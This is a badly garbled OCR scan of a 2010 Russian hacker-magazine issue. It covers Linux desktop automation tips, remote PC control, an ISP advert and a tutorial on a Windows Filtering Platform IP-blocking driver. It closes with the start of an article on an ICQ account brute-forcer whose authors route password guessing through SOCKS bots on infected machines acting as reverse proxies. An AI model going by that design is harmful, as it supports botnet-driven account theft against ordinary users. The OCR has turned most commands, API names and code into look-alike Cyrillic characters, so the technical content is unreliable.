показалосьслишком нерациональным, и я решил воспользоваться 
возможностями псевдо-Х-сервера Хпезі, который работает внутри окна 
уже существующего Х-сервера. Для его установки и запуска необходимо 
было выполнить всего две простых команды: 

$ зисіо арС-деС іпзРаІІ хпезС 

$ ХпезР : 1 -ас 

Здесь«:1 » — это адресХ-сервера, записанный в короткой форме (пол- 
ная форма выглядела бы примернотак: 127.0.0.1 :1]. «Корневой»Х-сер- 
вер автоматически получаетадрес«:0», поэтому все остальные сервера, 
запущенные на одной машине, должны иметь адреса по возрастанию. 
Опция «-ас» отключает проверку на права доступа к серверу, без нее 
клиенты-приложения (в моем случае это менеджер окон) не смогли бы 
получить доступ к серверу без подтверждения своих прав. В отличие 
от стандартного Х-сервера, Хпезі не использует драйвера для прямо- 
го доступа к дисплею и устройствам ввода, а вместо них использует 
возможности «корневого» сервера, создавая под свои нужды отдельное 
окно и перехватывая все обращения кнему. Чтобы запустить свои при- 
ложения в этом окне, необходимо проделать небольшой трюк, а именно 
— присвоить переменной окружения 0 1 3 Р Ь АУ адресХпезі (сделай это в 
новомтерминале): 




Управление менеджером окон 
из командной строки 



Вопреки распространенному мнению, в системахтипа ІІІЧІХавтома- 
тизации поддаются нетолько действия, выполняемые с помощью 
командного интерпретатора, но и многие операции с графическим 
интерфейсом. Яркий тому пример — протокол О- В 115, используемый 
для объединения компонентов рабочего стола в единое целое, и 
стандарт ЕѴѴМН (ЫеіѴѴМ), который определяет интерфейс взаимо- 
действия менеджера окон со сторонними приложениями. Объединив 
мощь 0 - В ЮЗ и ЕѴѴМН, можно добиться почти полной автоматизации 
графического интерфейса. О 0-ВІІ5 мы уже писали, поэтому для 
его изучения лучше обратиться к соответствующей статье («Хозяин 
цифровой магистрали», ][ от 09.20 1 0), а вот о ЕѴѴМН еще не говорили. 
Этот стандарт предназначен для болеетесной интеграции менеджера 
окон в графическое окружение, однако его можно использовать и для 
более гибкого управления оконной системой с помощью командного 
интерпретатора. 

Существует консольный ЕѴѴМН-клиент под названием ѵѵтсігі. Его 
назначение состоит втом, чтобы дать пользователю возможность 
управлять окнами прямо из командной строки или скриптов. В качестве 
аргументов команда принимает «действие» (в виде однобуквенной 
опции) и идентификатор окна, к которому это действие должно быть при- 
менено. Утилита может выполнить практически любое действие с окном, 
на которое способен сам менеджер окон, включая изменение размеров 
окна, изменение фокуса или закрытие окна. Вот несколько примеров: 

1 . Вывести окно с именем Еігеіох на передний план и назначить ему 
фокус ввода: 



$ ѵлпсСгІ -а Рігеіох 



2. Переместить окносименем доодіе-сбготе на текущий рабочий 
стол и вывести его на передний план: 

$ ѵлпсСгІ -К доодІе-сЬгоше 

3. Изменить размер окна с именем Еігеіюх: 

$ ѵшсСгІ -г Рігеіох -е '0,6,0,1040,708' 



$ БІЗРЬАУ=:1 



4 . Скрыть/показать окно с именем Хіегт: 



Далее можно за пускать любые приложения под управлением вирту- 
ального Х-сервера. Проблема тут заключается только втом, что он не 
совсем корректно отображает графику, и картинка может оказаться 
испорченной различными артефактами. К счастью, существует альтер- 
натива под названием Хербуг (пакет хзегѵег-хербуг], более продвинутая 
версия Хпезі;, лишенная данного недостатка: 

$ ХерЬуг : 1 -ас 



$ ѵлпсСгІ -г 'ХСегш' -Ь Соддіе , зЪасІесІ 

5 . Передвинуть окно Хіегт на рабочий стол номер 2: 

$ ѵлпсСгІ -г 'ХСегш' -С 2 

ѴѴтсігІ удобно использовать не только для автоматизации действий, 
ной чтобы назначить определенные действия на хоткеи (для связы- 
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V 11 О йі 

> йід +зИогѣ іх*: Ппих.мр. сід. сх 



"І_іпих (согатопіу ргопоипсей Іп ЕпдІіэПЧ; ѵагіапіз ехіаі) із а депегіс г 
егт геіеггіпд -ко ІІпіх-Іікѳ соприте г орегаііпд аувіеть Ьааей оп іПе ІДпи 
х кегпеі. ТПеіг сіеѵеіортпепі із опе ОТ ѢИе тозі: рготіпепі: ехатріез оТ Тг 
ее апсі ореп зоигсе аоііѵ/аге соІІаЬогаііопХ; ѣ" “урісэТЛу аіі іЬе ипсіегі 
уіпд зоигсе со<№ сап Ье и$еЩ Тгееіу «іосііТіеЩ апсі ге0і5*гіви*е<і Ьу апу 
опе ипйег ІПе Дегта оТ *Ие... М1р://а* ѵи/м:І_іпих" 

> I 

ОЫ5-запрос к Википедии возвращает не только ІР-адреса 

> сгі /Ноте/^ 1п\/0горЬох/ 

> сігорЬох_сІіепі.$Ь 
ЕпДег СоттапсІ; ипагпе -а 

І»іпих 1313 2. б .32 -24 -депегіс #41-иЬип*и 5МР ТЫ Аид 19 01:12:52 ШТС 201 
О І686 ШѴІіпих 

> зЬ сігорЬох_еІіеп’І: .аН 
Ёпіег СоттапсІ: ирііте 

16:29:21 ир 2: ОЗ, 1 изег, ІоасІ эѵегаде: 0,86, 0.87, 0.Ѳ2 

> I 

Управляем удаленным компом с помощью ЭгорЬох 



ѴУікіресІіа в консоли, используя РЫ5-запрос 

Ошеломляющий своей простотой консольный клиент ѴѴікіресІіа был 
опубликован на небезызвестном ресурсе ѵѵѵѵѵѵ.соттапбііпе^и .сот . 

Он состоит из одной строки и выводит на экран несколько первых строк 
статьи и ссылку на полную версию: 

# ! /Ъіп/зЪ. 

сіід +з1югД ДхД ${1} .ѵф.Од.сх 



вания клавиш с командами воспользуйся утилитой хбоікеуз, хбіпсікеуз 
или кеуіоисб]. 

Управление ПК с помощью 
смартфона 

Несмотря нато, что в плане развлечений большие домашние ПК 
постепенно уходят из моды, уступая ноутбукам, умным цифровым 
телевизорам и различным телевизионным приставкам, для многих 
гиков системный блоке большим широкоформатным монитором и 
хорошей акустической системой остается прекрасным мультиме- 
диа-центром, который они врядли в ближайшем будущем на что-то 
променяют. Однако у ПК есть один существенный минус, который за- 
ключается в отсутствии системы удаленного управления из коробки. 
Многие, конечно, уже успели приспособить ненужные старые пульты 
и инфракрасные приемники для выполнения этой задачи, однако 
технологичным и по-настоящему удобным такой подход назвать 
можно только с большой натяжкой. Для себя проблему удаленного 
управления я решил совсем по-другому. 

Уже давно в моей обители стоитточка доступа ѴѴі-Рі, которая раздает 
интернет по всему дому, поэтому, когда встал вопрос об организации 
удаленного управления домашним компом, мой взор сразу устре- 
мился в сторону смартфона, умеющего использовать ее возможности 
для выхода в интернет. Смартфон работал под управлением истинно 
ги ко вс кой ОС Апбгоіб, поэтому приложения для управления компом 
через ѴѴі-Рі для нее должны были быть обязательно (тем более что 
они есть и для ЗутЬіап, и для ѴѴіпсІоѵѵз МоЬіІе] . На запрос «Ретоіе 



Сопігоі» Апбгоіб Магкеі выдал несколько результатов, включая 
несколько программ для управления презентациями и медиа-серве- 
рами, не слишком функциональный РРетоІеОгоіб, II п іііесі Ретоіе с 
сервером только для ѴѴіпсІоѵѵз и Стоіе [ ѵѵѵѵѵѵ.дппоіе.огд ]. способный 
управлять І_іпих-машинами и полностью открытый в плане исходных 
кодов. На нем я и остановился. 

После установки программа предложила скачать и установить на 
управляемую машину серверное ПО. Пришлось перейти на офици- 
альный сайт и слить стандартный тарболл ( зііез.доодіе.сот/зііе/ 
тагсзІо/СтоІе5егѵег1_іпих2.0.0Лаг.д2 ]. который после распаковки 
оказался 2аѵа-программой. «Что ж, 2аѵа так 2аѵа», — подумал я и 
ввел в терминале заветную команду: 

$ зисіо арД-деД іпзДаІІ орегщ сПс- 6- з ге 

После выполнения команды «./СтоІеСегѵег.зЬ» из каталога с распа- 
кованным тарболлом сервер благополучно запустился, предложил 
ввести имена каталогов с медиа-файлами (например, ~/ѵібео и ~/ 
тіізіе] и задать пароль, после чего повис втрее. 

Клиент, запущенный на телефоне, самостоятельно нашел ближай- 
ший сервер и попросил ввести пароль. Спустя мгновение на экране 
появился весьма элегантный на вид интерфейс управления со 
стандартными клавишами ріау, зіор, раизе и т.д. Через меню можно 
было выбрать проигрываемый альбом или видеофайл, который будет 
воспроизведен на компе с помощью плеера ѵіс (его тоже придется 
установить). В качестве приятного дополнения оказалась доступна 
функция удаленной клавиатуры и мыши, которую можно использо- 
вать, когда не хочешь вставать с кровати, чтобы просто закрыть окно 
или запустить программу. 

Выводы 

Меньше слов — больше дела. Именно эта фраза лучше всего подхо- 
дит для заключения к статье. Ощутить удобство описанных инстру- 
ментов по описанию врядли удастся; только установив все это на 
свою машину и попробовав в деле, ты поймешь, насколько удобным 
может быть ЦІМІХ. т 
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АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Реклама 

Специальное предложение: 

ТСПСЛкПіІ ИНТЕРНЕТ 

I ІЛІ Ч* V 1 1 ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 

• Подключение - в любом месте Москвы и Московской обл. 

* Срок подключения в Москве - 14 дней, в Московской обл. - от 14 до 30 дней. 
•Установка прямого московского телефонного номера 
• Многоканальные телефонные номера 
• ІР-телефония 

• Выделенные линии Интернет 

• Корпоративные частные сети (ѴРІЧ) 

• Хостинг, услуги йаіа-цѳнтра 

РЛЛ Т&Леі€ОМ чѵѵт.гті.ги е-гтшіІ;іп{о@гт1»гіі (495) 988-8212 

Приглашаем специалистов, имеющих опыт работы в области телекоммуникации 










ССЮІЫб 





ѴШШ$ 

РіЙегіпп РІаНопп 

в защите ' 1 и нападении 



Разбираемся в теории и разрабатываем свой 
фильтрующий драйвер 



о Начиная с Зегѵег 2008 и Ѵізіа в винду был встроен механизм ѴѴРР, 
представляющий собой набор АРІ и системных сервисов. С помощью 
него стало можно запрещать и разрешать соединения, управлять 
отдельными пакетами. 

ЭТИ НОВОВВЕДЕНИЯ БЫЛИ ПРЕДНАЗНАЧЕНЫ ДЛЯ УПРОЩЕНИЯ Основные понятия 

ЖИЗНИ РАЗРАБОТЧИКОВ РАЗЛИЧНЫХ ЗАЩИТ. Внесенные в сете- Перед началом кодинга нам совершенно необходимо ознакомиться 
вую архитектуру изменения затронули как кегпеі-тосіе, так и с терминологией Майкрософта — и для понимания статьи будет 

изег-тосіе части системы. В первом случае необходимые функции полезно, и дополнительную литературу читать будет проще :). Итак, 
экспортируются Гѵѵрксіпізуз, во втором — Ілл/рисІпксШ. (буквы «к» и поехали. 

«и» в названиях библиотек означают кегпеі и изег соответственно). КЛАССИФИКАЦИЯ — процесс определения того, что нужно делать 
В этой статье мы расскажем о применении ѴѴРР для перехвата и с пакетом. Из возможных действий: разрешить, блокировать или 
фильтрации трафика, а после ознакомления с основными опреде- вызвать саііоиі:. 

лениями и возможностями ѴѴРР мы напишем свой простой фильтр. САИОІЯ5 — это набор функций в драйвере, которые проводят 
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Результат работы нашего простого фильтра 
— соединение блокируется 

инспекцию пакетов. Они имеют специальную функцию, 
выполняющую классификацию пакетов. Эта функция 
может принять следующее решение: 

• разрешить (РѴѴР_АСТІОІ\І_РЕПМІТ); 

• блокировать (РѴѴР_АСТІОІ\І_ВІ_ОСК); 

• продолжить обработку; 

• запросить больше данных; 

• прервать соединение. 

ФИЛЬТРЫ (РИТЕК5) — правила, указывающие, в каких 
случаях вызывается тот или иной саИоиР 
Один драйвер может иметь несколько саІІоиГов, а раз- 
работкой драйвера с саііоиі’ом мы и займемся в этой 
статье. Кстати, колауты есть и встроенные, например, 
І\ІАТ-саІІоиІ. 

ЬАУЕР — это признак, по которому объединяются раз- 
личные фильтры (или, как говорят в М50КІ, «контей- 
нер»). 

По правде говоря, документация от МісгозоІТ (ссылка 
в конце статьи), выглядит достаточно мутно, пока не 
заглянешь в примеры в ѴѴОК. Поэтому, если вдруг 
надумаешь разрабатывать что-то серьезное, нужно 
непременно с ними ознакомиться. Ну что ж, теперь 
плавно перейдем к практике. Для успешной компиля- 
ции и тестов тебе потребуется Ѵ\ЮК (ѴѴіпсІоѵѵз Огіѵег КМ;) , 
ѴппѴѴаге, виртуальная машина с установленной Вистой 
и отладчик ѴѴіпОЬд. Что касается Ѵ\ШК, то у меня лично 
установлена версия 7600.16385.0 — там есть все необ- 
ходимые либы (поскольку мы будем разрабатывать 
драйвер, нам нужны только бѵѵрксіпі. ІіЬ и піозкгпі.ііб) и 
примеры использования ѴѴРР. 

Ссылки на весь инструментарий уже неоднократно при- 
водились, поэтому повторяться не будем. 

Сосііпд 

Для инициализации саііоиі’а я написал функцию 
Вііпіііаііге. 

Общий алгоритм создания саііоиі: и добавления фильтра 
та ков: 

1) РУУ/РМЕІЧСІМЕОРЕІЧО осуществляет открытие сеанса; 

2) РѴѴРМТРАМ5АСТІОМВЕСІМО— начало операции с ѴѴРР; 

3) РѴѴР5САИОІЯВЕСІ5ТЕВО — создание нового саііоиі; 

4) РѴѴРМСАИОІЯАООО — до ба вление объекта саІІоЩ’а в 
систему; 

5) РѴѴРМРИТЕВАООО — добавление нового фильтра(ов); 

6) РѴѴРМТВАМ5АСТІОМСОММІТО — сохранение измене- 
ний (добавленных фильтров). 

Обрати внимание, что функции оканчиваются на 0. В 
ѴѴіпсІоѵѵз 7 некоторые из этих функций были изменены, 
например, появилась РѵѵрзСаІІоиіПедізІегІ (при сохра- 
ненной РѵѵрзСаІІоиіПедізІегО]. Отличаются они аргумен- 
тами и, как следствие, прототипами классифицирующих 




Утилита диіс!деп.ехе от МісгозоА для создания своего СІІЮ'а 



функций, но для нас это сейчас неважно — 0-функции 
универсальны. 

РѵѵртЕпдіпеОрепО и РѵѵртТгапзасІіопВедіпО не 
особо нам интересны — это подготовительный 
этап. Самое интересное начинается с функции 
РѵѵрзСаІІоиіРедізІегО: 

Прототип РѵѵрзСаІІоиіРедізІегО 

РТЗТАТЦЗ КТАРІ РѵѵрзСаІІоиТКедізТегО 
( 

іпоиТ ѵоіс *с!еѵісеОкП есТ , 

іп сопзТ РМРЗ_САШОІІТО *са11оиТ, 

оиТ_орТ ІЛЫТ32 *са11оиТІсІ 

) ; 
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> Ііпкз 

• ЫірѴ/тзсІп. 

ті егозой .сот/ 
еп-из/ІіЬгагу/ 
аа36651 0(Ѵ5.85).азрх 
— информация 
о ѴѴіпсІоѵѵз Ріііегіпд 
Ріаііогт на сайте М5. 



Я уже говорил, что саііоиі: — это набор функций, теперь 
пришло время рассказать об этом подробнее. Структура 
РѴѴР5_САІ_І_ОІІТО содержит указатели на три функции 
— классифицирующую (сіаззііурп) и две уведомляющие 
(о добавлении/удалении фильтра (поіііурп) и закрытии 
обрабатываемого потока (ИоѵѵОеІеІеРп)). Первые две 
функции являются обязательными, последняя нужна 
только в случае, если ты хочешь мониторить сами паке- 
ты, а не только соединения. 

Также в структуре содержится уникальный идентифика- 
тор, ОЮЮ колаута (саІІоиіКеу). 



• ѵѵѵѵѵѵ.котосііа.сопп/ 
і п б ех . р И р ? р а д е=ѵѵІр. 

Ыт — известный 
своими примерами 
І_5Р-провайдеров 
сайт, содержащий бо- 
лее краткое описание 
составляющих ѴѴРР. 



Код регистрации саііоиі 

РШРЗ_САШОЪТ зСаІІоиТ = {0}; 



зСаІІоиТ . саІІоиТКеу = *са11оиТКеу ; 
зСаІІоиТ . сІаззіТуРп = ВІСІаззіТу; 

// классифицирующая функция 
зСаІІоиТ . поТіТуРп = 

( РМРЗ_САЬЬОІІТ_ЫОТІРУ_РЫО ) ВІРГоТ і Ту ; 

// функция, уведомляющая о добавлении/ 
удалении фильтра 

// создаем новый колаут 
зТаТиз = РѵѵрзСаІІоиТКедізТег 

( беѵісеОЬ^ есТ , &зСа!1оиТ, саІІоиТІсі) ; 
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КгаГЫсШіііег 
РиеІ ПНег 



Далее нужно добавить объект-саііоиі в систему и присоеди- 
нить его к определенному уровню ( Іауег] с помощью функции 
ЕѵѵртСаІІоиіАсІсІО: 



ВШИБ ШІЫАРІ ЕѵфтСаІІоибАсІсІО ( 

ІИ НАИВЬЕ епдіпеНапсПе , 

іп сопзб РТАГРМ_САЬЬОиТО *са11оиб, 

іп_орб РЗЕСІШІТУ_ВЕЗСКІРТОК зб, 

оиб_орб ІЛКГТ32. *іб 



) ; 



буребеб збгисб ШШ_САЬЬОШО_ { 

СІИ В саІІоибКеу; 

Е1л1РМ_ВІЗРЕАУ_ВАТА0 бізрІауВаба ; // описание саііоиб 



ІЛЫТ32 

СІЛВ 

ЕМР_ВУТЕ_ВЬОВ 

СІЛВ 

6ШМТ32 

} РѴ7РМ_САЬЬОІІТО ; 



біадз ; 

*ргоѵіс!егКеу ; 
ргоѵібегВаба ; 
аррІісаЫеЬауег ; 
саііоибісі; 



В структуре РѴѴРМ_САИОІІТО нам интересно поле аррІісаЫеІ_ауег — 
уникальный идентификатор уровня, на который добавляется саііоиі 
В нашем случае это РѴѴРМ_ІАУЕВ_АІЕ_АиТН_С0ММЕСТ_Ѵ4. «ѵ4» в 
названии идентификатора означает версию протокола I рѵ4, есть также 
РѴѴРМ_ЕАУЕР_АЕЕ_АЕІТРІ_С0МЫЕСТ_Ѵ6 для Ірѵб. 

Учитывая малую распространенность Ірѵб на настоящий момент, рабо- 
тать мы будем только с Ірѵ4. СОЫІЧЕСТ в названии означает, что мы 
контролируем только установку соединения, о входящих и исходящих 
на этот адрес пакетах речи не идет! Вообще уровней, помимо исполь- 
зованного нами, много — они объявлены в заголовочном файле 
Іѵѵртк.Ь из ѴѴОК. 



Добавление объекта-саііоиі в систему 

// название саііоиб 

сіізрІауБаба . паше = ІР'ВІоскег Саііоиб"; 
бізрІауВаба . безсгірбіоп = ІР'ВІоскег Саііоиб"; 
тСаІІоиб . саІІоибКеу = *са11оибКеу; 
тСаІІоиб . бізрІауВаба = сІізрІауВаба; 

// описание саііоиб 
/ / ЕѴ/РМ_ЕАУЕК_АЬЕ_АІЛН_СО]>ШЕСТ_Ѵ4 
тСаІІоиб . аррІісаЫеЬауег = *1ауегКеу; 
збабиз = ЕѵдэтСаІІоибАсІсІ ( 

дЕпдіпеНапсіІе , 

&тСа11оиб , НІІЬЬ , ]ШЬЬ ) ; 



Итак, после того, как саііоиі успешно добавлен в систему, нужно соз- 
дать фильтр, то есть указать, в каких случаях будет вызываться наш 
саііоиі, а именно — его классифицирующая функция. Новый фильтр 



создается функцией РѵѵртЕіІІегАббО, которой в качестве аргумента 
передается структура РѴѴРМ_РІЕТЕРО. 

В РѴѴРМЕІ ЕТЕРО есть одна или несколько структур ЕѴѴРМ_ЕІЕТЕВ_ 
СОІ\ЮІТЮІ\ІО (их число определяется полем питЕіІІегСопбіІіопз]. 
Поле ІауегКеу заполняется ОІІЮ’ом уровня (Іауег), к которому мы 
хотим присоединиться. В данном случае указываем ЕѴѴРМ_ЕАУЕВ_ 
АЕЕ_АЕ1ТН_С0Ы N ЕСТ_Ѵ4. 

Теперь подробнее рассмотрим заполнение РѴѴРМ РІ ЕТЕР_ 
СОІЧОІТІОІЧО. Во-первых, в поле ІіеІсІКеу нужно явно указать, что мы 
хотим контролировать — порт, адрес, приложение или что-то еще. В 
данном случае ѴѴРМ_С0МВІТІ0І\І_ІР_ВЕМ0ТЕ_АВВВЕ55 указывает 
системе, что нас интересует ІР-адрес. Значение ІіеІсІКеу определяет, 
значения какого типа будут в структуре ЕѴѴР_СОІ\ІВІТІОІ\І_ѴАЕІІЕ, 
входящей в ЕѴѴРМ_ЕІЕТЕП_СОІ\ЮІТІОІ\ІО. В данном случае в ней 
содержится ірѵ4-адрес. Идем дальше. Поле таІсЬТуре определяет, 
каким образом будет производиться сравнение значения в ЕѴѴР_ 
СОІ\ІВІТІОІ\І_ѴАЕІІЕ с тем, что пришло по сети. Тут вариантов много: 
можно указать ЕѴѴР_МАТСН_ЕОПАЕ, что будет означать полное соот- 



Добавление фильтра в систему 



біібег . біадз = ЕГОРМ_ЕІЬТЕК_ЕЬАС_ЮЫЕ; 
біібег . ІауегКеу = * ІауегКеу; 

біібег . бізрІауВаба . паше = Ь"В1оскег Саііоиб"; 
біібег . бізрІауВаба . безсгірбіоп = 

Ь"В1оскег Саііоиб"; 

біібег . асбіоп . куре = ЕГОР_АСТІОН_САЬЬОВТ_ШКНОШ; 
біібег. асбіоп. саІІоибКеу = *са11оибКеу; 
біібег . біІбегСопбібіоп = біІбегСопбібіопз ; 

/ / одно условие фильтрации 
біібег . питЕіІбегСопсІібіопз = 1; 

//біібег . зиЪЬауегКеу = ЕѴЛМ_ЗІІВЕАУЕК_ШІѴЕКЗАЕ; 
біібег .ілеідкб . буре = ЕМР_ЕМРТУ; // аибо-\ѵеідЬ.б . 
// добавляем фильтр на удаленный адрес 
біІбегСопсІібіопз [ 0 ] . біеІсІКеу = 

РМРМ-СГЖБ I Т I СЖ_І Р_КЕМОТЕ_АВВКЕ 3 3 ; 
біІбегСопсІібіопз [0] .шабскТуре = ЕМР_МАТСН_ЕОІІАЕ ; 
біІбегСопсІібіопз [ 0 ] . сопсіібіопѴаІие . буре = 
ЕШМЛЫТ32 ; 

біІбегСопсІібіопз [ 0 ] . сопсіібіопѴаІие . иіпбЗ 2 = 
пбоЪ.1 (ВЬОСКЕБ_ІР_АВВКЕЗЗ) ; 

/ / добавляем фильтр 
збабиз = ЕѵтршЕіІбегАбб ( 

дЕпдіпеНапсіІе , 

&бі1бег , 

ШББ, 

ШЬЬ) ; 



► 104 



ХАКЕР 11/142/10 





~ Р.ур 



& 



4есителі сг1пе*гп<т 
гНйиі'Се ШМбѵѵС ліІі*р*л л Юг ~0и. 



Ор*гг 



ЬсМЯ/ОДДОЛфДОЩ ОЩУСРОРТ 1 ВіфкІТЪ V 
г- Тп« щѵ лі! ы ат*л ■-. іеіъ *&лнмя*цп е рп- ь ікд«. 



<ж 



С*П«І 



Настроить параметры гостевой системы можно 
через стандартный гип или с помощью сторонних 
утили 



ветствие условию, а можно — РѴѴР_МАТСН_І\ЮТ_ЕСІІ)АІ_, то есть, фак- 
тически, мы можем добавить таким образом исключение фильтрации 
(адрес, соединение с которым не отслеживается]. Еще есть варианты 
РѴѴР_МАТСН_0РЕАТЕР, ЕѴѴР_МАТСН_ЕЕ55 и другие (см. энум ЕѴѴР_ 
МАТСН_ТѴРЕ). В данном случае у нас стоит ЕѴѴР_МАТСН_ЕОиАЕ. 

Я не стал сильно заморачиваться и просто написал условие на бло- 
кирование одного выбранного ІР-адреса. В случае, когда какое-то 
приложение попытается установить соединение с выбранным адре- 
сом, будет вызвана классифицирующая функция нашего саІІоиЕа. 

Код, обобщающий сказанное, ты можешь посмотреть на врезке 
«Добавление фильтра в систему». 

Вообще, конечно, фильтрующих условий может быть много. Например, 
можно указать блокирование соединений с определенным удален- 
ным или локальным портом (ЕѴѴРМ_СОМВІТІОЫ_ІР_РЕМОТЕ_РОРТ и 
Е\А/РМ_С0ЫВ1ТЮМ_1Р_Е0САЕ_Р0РТ соответственно]. Можно вылав- 
ливать все пакеты определенного протокола или определенного при- 
ложения. И это еще не все! Можно, например, заблокировать трафик 
определенного пользователя. В общем, есть где разгуляться. 

Впрочем, вернемся к фильтру. Классифицирующая функция в нашем 
случае просто блокирует соединение с указанным адресом (ВЕ0СКЕ0_ 
ІР_А00РЕ55], возвращая ЕѴѴР_АСТІОІ\І_ВЕОСК: 

Код нашей сІаззКу-функции 

ѵоісі ВІСІаззібу ( 

сопзб РБР8_ІБСОМІБС_УАШЕ8 * іпРіхебѴаІиез , 

сопзб РБР8_ІБСОМІБС_МЕТАБАТА_ѴАШЕ8* іпМебаѴаІиез , 

ѴОІБ* раскеб , ІБ сопзб РБРЗ_РІБТЕК* біібег, 

БІБТ64 бІотлСопбехб , РБР8_СБА88ІРУ_ОБТ* сІаззібуОиб) 

{ 

// заполняем структуру РБР8_СБА88ІРУ_ОБТО 
іб (сІаззібуОиб ) { // блокируем пакет 

с1аззібу0иб->асбіопТуре = РБР_АСТІОБ_ВБОСК; 

// при блокировании пакета нужно сбрасывать РБР8_ 

КІ СНТ_АС Т I ОБ_Ш. I ТЕ 

с1аззібу0иб->гід]ібз&=~РБРЗ_КІСНТ_АСТІ0Б_БКІТЕ; } } 

На практике функция классификации также может установить ЕѴѴР_ 
АСТІОІ\І_РЕРМІТ, ЕѴѴР_АСТІОЫ_СОМТІМиЕ и др. 

И в заключение при выгрузке драйвера нужно удалить все установ- 
ленные саІІоиЕы (угадай, что будет, если система попытается вызвать 
саііоиі выгруженного драйвера? Правильно, В5СЮ]. Для этого суще- 
ствует функция ЕѵѵрзСаІІоиШпгедізіегВуІсІ. В качестве параметра ей 
передается 32-битный идентификатор саІІоиЕа, возвращенный функ- 
цией ЕѵѵрзСаІІоиШедізІюг. 




Настройки последовательного порта гостевой системы 

> 

іб (дВІСа11оибІсІѴ4 ) { 

пз =Рѵ\грзСа11оибБпгедізбегВуІс1 (дВІСа11оибІсІѴ4 ) ; 

} 

гебигп пз; 

} 

Полный исходный код драйвера прилагается к статье. Как видишь, 
программирование ѴѴЕР-фильтра — не такая сложная задача, 
поскольку М5 предоставили нам весьма удобный АРІ. Кстати, в нашем 
случае мы устанавливали фильтр в драйвере, но это можно делать и 
из юзермода! Например, семпл из ѵѵбк тзптпіт (монитор трафика 
М5І\І Меззепдег-а] так и поступает — это позволяет не перегружать 
кегпеі-тосіе часть фильтра. 

свой сию 

Для регистрации саііоиі: ему нужен уникальный идентификатор. Для 
того, чтобы получить свой 61Л0 (ОІоЬаІІу ІІпщие ІсІепііЕег), исполь- 
зуй диібдеп.ехе, входящий в Ѵізиаі 5Шбіо. Лежит тулза в (Ѵ5_Ра1:Ь]\ 
Соттоп7\ТооІз. Вероятность коллизии очень мала, поскольку длина 
61ІЮ составляет 128 бит, и всего доступно 2 Л 1 28 идентификаторов. 

Отладка фильтра 

Для отладки дров удобно использовать связку ѴѴіпбЬд+ѴтѴѴаге. Для 
этого нужно настроить как гостевую систему (в виде которой выступает 
ѴізЫ, так и отладчик ѴѴіпОЬд. Если у ѴѴіпХР для удаленной отладки 
нужно было редактировать ЬооЕіпі, то для ѴІ 5 Іа+ есть консольная ути- 
лита ЬсбебіЕ Как обычно, нужно включить отладку: 

ВСБебіб /бЪдзеббіпдз 8ЕКІАБ БЕВШРОКТгІ 
ВАББКАТЕ: 115200 

ВСВебіб /беЬид ОБ (или ВСВебіб /зеб беЬид ОБ) 

Далее нужно настроить последовательный порт удаленной системы 
(см. соответствующую иллюстрацию]. 

Теперь все готово! Запускаем батник с нижеприведенным текстом: 

збагб міпбЪд -Ь -к сот: ріре , рогб=\\ . \ріре\ 
сот_1 , гезебз=0 



Завершение работы саІІоиГа 

БТ8ТАТБЗ ВІБпіпібіаІіге ( ) { 

БТЗТАТБ8 пз; 
іб (дЕпдіпеНапбІе) { 

РмртЕпдіпеСІозе (дЕпдіпеНапбІе) ; 



и лицезреем отладочный вывод в окне ѵѵіпбЬд (см. картинку]. 

Заключение 

Как видишь, область применения ѴѴЕР довольно широка. Тебе решать, 
как применить эти знания — во зло или во благо 
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Исходников не будет, так как, 
во-первых, целиком иху меня 
нет, во-вторых, коммерческая 



Опятъ 

ты, Брут? 

Изучаем возможности 
«прокси наоборот» на примере брутфорсера 




© В середине 2008 года мы с человеком, скрывающимся под ником 
ОзІѴѴау, написали 5ІШ Вшіе - брутфорс ІСО с поддержкой абсолютно 
нового (для ІСО) типа прокси - анонимайзеров. В то время это было 
революцией в бруте ІСО. Спустя два года, я думаю, настало время 
совершить новую революцию. 



Общая теория 

КАКИМИ ЖЕ ОНИ БУДУТ, ЭТИ НОВЫЕ ПРОКСИ, И ЗАЧЕМ ОНИ 
НУЖНЫ? Да вай рассмотрим основные проблемы, с которы- 
ми приходится сталкиваться при бруте через обычные прокси. 
Предположим, что у тебя есть приватный 50СК5-бот, и есть где 
взять загрузки. Перед тобой встанут следующие затруднения: 

1. Очень, очень мало интернет-юзеров имеют реальный ІР — ІРѵ4- 
адреса подходят к концу, провайдеры сажают абонентов за І\ІАТ, 
откуда бот, само собой, работать не будет. Теряем много денег; 

2 . 99% гарантия, что не ты один будешь использовать свои прокси 
— в итоге они очень быстро сдохнут, и брут будет идти медленно. 
«Ну, и что же делать?», — спросишь ты. Так вот, сегодня я поведаю 
тебе об абсолютно новой концепции брута. Как обычно работает 
брутфорс? Он коннектится к прокси (50СК54/5 или НТТР(з)), пере- 
дает им информацию, получает ответ и анализирует его. В нашем 
случае все будет по-другому — прокси коннектятся к брутфорсу, он 
вместо целого пакета логина передает только пару иіщраззѵѵогсі, 

и получает в ответ всего один байт — так мы уменьшаем объем 
переданной информации, и, следовательно, увеличиваем скорость. 
Пакет для логина собирается уже самой проксей, ею же анализиру- 
ется ответ. Все предельно просто. 



Бот будет написан на чистом С++ и ѴѴіпЗоск (я использую М5 Ѵізиаі 
С++ 2008 Ехргезз; кстати, только ради этого проекта я держу винду), 
а брутфорс — на С++ с фреймворком О!, так как будет меньше 
возни, быстрее написание + кроссплатформенность, что очень 
актуально — вдруг я захочу юзать свое творение на линуксовом 
или бээсдешном дедике? 

Теория ІСО 

Как происходит логин на сервер ІСО? Если брать небезопасный 
логин (где пароль передается в открытом виде, а нам как раз этот 
способ и нужен, поскольку так проще), то логин выглядит так: 

(здесь и далее: «->» — действие от нас, «<-» — действие со сторо- 
ны сервера) 

1. -> Коннект к серверу ІСО; 

2 . Неііо-пакет. Первый байт в нем всегда равен 0x2а (как и в 
любом пакете ІСО); 

3. Отправка пакета с данными для авторизации (то есть 1)ІІ\І, 
пароль, геолокация, язык и т.д.); 

4 . Пакет с результатами авторизации и дисконнект со стороны 
сервера. 

Как видишь, сервер первым «здоровается» с нами. Если первый 
байт от сервера не равен 0x2а, значит, мы приконнектились не 



► юб 



ХАКЕР 11/142/10 





к тому серверу. На четвертом шаге, если мы зало- 
гинились удачно, нам приходит пакет 5РѴ_С00КІЕ, 
содержащий адрес В05-сервера, и, собственно, куки 
для авторизации. Если неудачно — пакет с описанием 
ошибки. В любом случае, после передачи этого пакета 
нас дисконнектит (пакет отправляется по каналу 0x04, 
то есть СІ_05Е_С0ММЕСТІ0І\І). 

В протоколе 05САР существуют три основных типа 
данных, ниже они перечислены в порядке «вложенно- 
